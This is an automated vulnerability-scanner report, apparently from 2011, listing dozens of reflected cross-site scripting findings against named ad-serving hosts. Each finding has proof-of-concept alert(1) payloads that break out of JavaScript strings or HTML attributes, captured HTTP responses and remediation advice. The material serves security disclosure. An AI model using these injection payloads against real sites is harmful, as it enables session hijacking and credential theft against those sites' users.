Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e29f0'-alert(1)-'495cc3a8968 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:36 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:36 GMT
Content-Length: 465
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54ed7'-alert(1)-'b5d97559d24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:38 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:38 GMT
Content-Length: 465
1.3. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/q1.nydailynews/be_news_fr
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2432'-alert(1)-'629570ea7b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:34 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:34 GMT
Content-Length: 468
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfab9'-alert(1)-'5998b10273a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:32 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:32 GMT
Content-Length: 465
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adf09'-alert(1)-'882062a794c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 31 Aug 2011 17:54:54 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7703
var cid='12244bc34a8b1dc';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-10212190423_1314813294","http://ib.adnxs.com/ptj?member=988&inv_code=ns.informitadf09'-alert(1)-'882062a794c&size=728x90&imp_id=ns-10212190423_1314813294,12244bc34a8b1dc&referrer=http%3A%2F%2Fwww.informit.com%2Findex.aspx%3F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fns.informitadf09%27-alert%281%29-%2788 ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49732'-alert(1)-'e101f0e3a6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3ae6'-alert(1)-'d4fccf3dad4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ab3'-alert(1)-'496270f1c8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb061'-alert(1)-'3b9133a92e3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0ad5"-alert(1)-"299ee2f63f6 was submitted in the dcove parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5599
Date: Thu, 11 Aug 2011 22:35:47 GMT
document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
fun ...[SNIP]... 65832709%3B3454-728/90%3B42962870/42980657/1%3B%3B%7Efdr%3D242952151%3B0-0%3B0%3B65830267%3B3454-728/90%3B42793270/42811057/1%3B%3B%7Esscs%3D%3fhttp://g.ca.bid.invitemedia.com/pixel?returnType=redirectd0ad5"-alert(1)-"299ee2f63f6&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=http://www.chevydealer.com"); var ...[SNIP]...
The value of the key request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b85d2"-alert(1)-"9fb1a5c772 was submitted in the key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5598
Date: Thu, 11 Aug 2011 22:36:13 GMT
document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
fun ...[SNIP]... B3454-728/90%3B42962886/42980673/1%3B%3B%7Efdr%3D242952151%3B0-0%3B0%3B65830267%3B3454-728/90%3B42793270/42811057/1%3B%3B%7Esscs%3D%3fhttp://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Clickb85d2"-alert(1)-"9fb1a5c772&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=http://www.chevydealer.com"); var dcpass = ...[SNIP]...
The value of the message request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dc4b"-alert(1)-"25b430650 was submitted in the message parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5594
Date: Thu, 11 Aug 2011 22:36:42 GMT
document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
fun ...[SNIP]... .bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-1dc4b"-alert(1)-"25b430650&redirectURL=http://www.chevydealer.com"); var dcpass = "?cmp=OLA_BRAND_5198302_42962886"; var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the redirectURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e6bc"-alert(1)-"86ae1e132e1 was submitted in the redirectURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5386
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 11 Aug 2011 22:37:12 GMT
Expires: Thu, 11 Aug 2011 22:37:12 GMT
document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
fun ...[SNIP]... dia.com/pixel?returnType=redirect&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=6e6bc"-alert(1)-"86ae1e132e1http://www.chevydealer.com"); var dcpass = "?cmp=OLA_BRAND_5198302_42962886"; var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; ...[SNIP]...
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3468"><script>alert(1)</script>4e3e8f5f0f was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1d9e"><script>alert(1)</script>2194221d73c was submitted in the sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46cfb"-alert(1)-"dabdda859b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50b51"-alert(1)-"91173d12182 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52fec"-alert(1)-"55c76269dd8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e25a7"-alert(1)-"93324f8b867 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dadb"-alert(1)-"a0bf3312ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 926d3"-alert(1)-"2636b1944da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44dc9"-alert(1)-"0ee88ea36e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85077"-alert(1)-"33cf11815f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a664"-alert(1)-"9cedc40d16c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbc76"-alert(1)-"09d21fbc5ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e33a"-alert(1)-"065a4278d48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56556"-alert(1)-"6b88251e67d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9013f"-alert(1)-"1cee8c0ee9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cd9a"-alert(1)-"4fcb73030b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f6b3"-alert(1)-"1ea28baa207 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1928"-alert(1)-"498b288b29c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e3d7"-alert(1)-"cd5633629a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93015"-alert(1)-"214765a46a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62600"-alert(1)-"64c1d70f5ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f62d4"-alert(1)-"b058ff9b208 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68891"-alert(1)-"8062c447371 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23e81"-alert(1)-"624d2126b2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f1c"-alert(1)-"52bc10e1626 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bceff"-alert(1)-"43132adc9ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6724"-alert(1)-"3898a6cbc75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dd3e"-alert(1)-"787499129a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25b30"-alert(1)-"9953fe8144b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5717a"-alert(1)-"218f6484cfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70d3c"-alert(1)-"8b3b1df80a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d22f2"-alert(1)-"e9197d2134d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dea1"-alert(1)-"006abeca062 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb300"-alert(1)-"409ac85f166 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7777"-alert(1)-"a13f0a5b58b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40098"-alert(1)-"5bdb9e64bb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa8e5"-alert(1)-"356cce5b60c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29180"-alert(1)-"7329e8c1b16 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ef6f"-alert(1)-"e393df477e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb17d"-alert(1)-"02e42cf89a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
